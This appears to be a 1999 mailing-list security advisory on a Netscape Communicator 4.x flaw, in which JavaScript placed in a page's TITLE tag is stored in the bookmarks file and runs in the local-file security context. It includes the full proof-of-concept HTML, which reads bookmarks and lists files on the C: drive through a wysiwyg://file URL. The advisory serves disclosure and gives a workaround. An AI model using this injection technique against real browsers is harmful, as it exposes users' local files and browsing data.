netscape.bookmarks.title.js.txt

`Date: Sun, 16 May 1999 17:17:34 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Netscape Communicator bookmarks <TITLE> security vulnerability  
  
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux  
(guess all 4.x versions are affected) in the way they handle special  
bookmarks  
with JavaScript code in the title.  
  
If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>  
tag and bookmark that page, the JavaScript code is written in the local  
bookmarks file.  
Then when the bookmarks file is open, the JavaScript code is executed in  
the security  
context of a local file - the bookmarks file.  
The bookmarks file may be open by a script, probably a server redirect  
or by the user.  
The bookmarks file name must be known, but it is easily guessed for most  
dialup  
users.  
  
Vulnerabilities: reading user's bookmarks, browsing local directories,  
reading local files (works fine on Linux, probably possible on Windows).  
  
Workaround: Disable JavaScript or do not bookmark untrusted pages.  
  
Demonstration is available at: http://www.nat.bg/~joro/book2.html  
See attached file for the source.  
  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
--------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/book2.html>  
  
<HTML><HEAD>  
<TITLE>  
<SCRIPT>  
alert('Bookmarks got control');  
  
  
s='Here are some bookmarks: \n';  
for(i=1;i<7;i++)  
s += document.links[i]+'\n';  
alert(s);  
  
dirToRead='wysiwyg://2/file://c:/';  
a=window.open(dirToRead);  
s='Here are some files in C:\\ :\n';  
for(i=1;i<7;i++)  
s += a.document.links[i]+'\n';  
a.close();  
alert(s);  
  
  
  
</SCRIPT>  
</TITLE></HEAD>  
<BODY>  
  
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks  
with Javascript code in the title.  
<br>If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>  
tag and bookmark that page, the JavaScript code is written in the local bookmarks file.  
Then when the bookmarks file is open, the JavaScript  
code is executed in the security context of a local file. The bookmarks  
file may be open by a script, probably a server redirect or by the user.  
The bookmarks file name must be known - easily guessed for most dialup  
users.  
<p>Vulnerability: reading user's bookmarks, browsing local directories,  
reading local files (works fine on Linux, probably possible on Windows).  
<br>  
Workaround: Disable JavaScript or do not bookmark untrusted pages.  
<br>  
<hr WIDTH="100%">  
<br>To test it:  
<br>1) Bookmark this page.  
<br>2) Close all NC windows and restart NC.  
<br>3) Open bookmarks file (change the filename in the field below if needed  
and click "Open bookmarks", or use File| Open Page... )  
<br>  
<hr WIDTH="100%">  
  
<FORM>  
Enter the file name of your bookmarks file:  
<INPUT TYPE=TEXT SIZE=70 VALUE='c:\Program Files\Netscape\Users\default\bookmark.htm'>  
</FORM>  
  
<SCRIPT>  
function openBookmarks() {  
  
/* bmFile='c:\\Program Files\\Netscape\\Users\\default\\bookmark.htm'; */  
a=window.open('wysiwyg://1/file:///'+document.forms[0].elements[0].value);  
}  
</SCRIPT>  
  
<A HREF="javascript:openBookmarks()">Open bookmarks</A>  
</BODY>  
<hr WIDTH="100%">  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
</HTML>  
`